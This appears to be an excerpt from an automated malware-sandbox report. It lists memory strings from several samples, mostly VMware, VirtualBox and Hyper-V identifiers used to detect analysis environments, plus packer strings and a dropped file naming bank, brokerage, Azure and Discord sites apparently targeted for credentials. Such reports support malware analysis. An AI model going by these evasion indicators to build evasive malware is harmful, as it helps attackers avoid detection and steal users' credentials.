                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Microsoft Hyper-V Server
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
                        Source: a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: vmware
                        Source: BAEBFIIE.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
                        Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: "Windows 8 Microsoft Hyper-V Server
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
                        Source: explorti.exe, explorti.exe, 0000000B.00000002.2370774596.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.2659743928.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000010.00000002.3262920684.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000011.00000002.3864077697.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000012.00000002.4462386574.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
                        Source: BAEBFIIE.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V
                        Source: BAEBFIIE.0.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
                        Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
                        Source: BAEBFIIE.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Standard without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Hyper-V (guest)
                        Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: BAEBFIIE.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                        Source: BAEBFIIE.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Microsoft Hyper-V Server
                        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                        Source: HCGCBFHCFC.exe, 00000008.00000003.2303003406.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F
                        Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000135C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000C6C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: ~VirtualMachineTypes
                        Source: BAEBFIIE.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000135C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000C6C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                        Source: BAEBFIIE.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Microsoft Hyper-V Server
                        Source: file.exe, 00000000.00000002.2271711490.000000000135C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000C6C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                        Source: BAEBFIIE.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
                        Source: BAEBFIIE.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Standard without Hyper-V
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: )Windows 8 Server Standard without Hyper-V
                        Source: HCGCBFHCFC.exe, 00000008.00000002.2322856560.00000000009AA000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 0000000A.00000002.4551933832.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000B.00000002.2370774596.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.2659743928.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000010.00000002.3262920684.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000011.00000002.3864077697.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000012.00000002.4462386574.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
                        Source: BAEBFIIE.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
                        Source: BAEBFIIE.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: %Windows 2012 Microsoft Hyper-V Server
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Hyper-V
                        Source: Amcache.hve.6.drBinary or memory string: VMware
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: $Windows 8.1 Microsoft Hyper-V Server
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: ,Windows 2012 Server Standard without Hyper-V
                        Source: BAEBFIIE.0.drBinary or memory string: discord.comVMware20,11696487552f
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Microsoft Hyper-V Server
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
                        Source: BAEBFIIE.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Essential Server Solutions without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Essential Server Solutions without Hyper-V
                        Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C34000.00000004.00000020.00020000.00000000.sdmp, a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: BAEBFIIE.0.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V (core)
                        Source: BAEBFIIE.0.drBinary or memory string: tasks.office.comVMware20,11696487552o
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
                        Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
                        Source: BAEBFIIE.0.drBinary or memory string: AMC password management pageVMware20,11696487552
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: %Windows 2016 Microsoft Hyper-V Server
                        Source: BAEBFIIE.0.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                        Source: BAEBFIIE.0.drBinary or memory string: dev.azure.comVMware20,11696487552j
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
                        Source: BAEBFIIE.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
                        Source: BAEBFIIE.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: +Windows 8.1 Server Standard without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V
                        Source: BAEBFIIE.0.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: BAEBFIIE.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
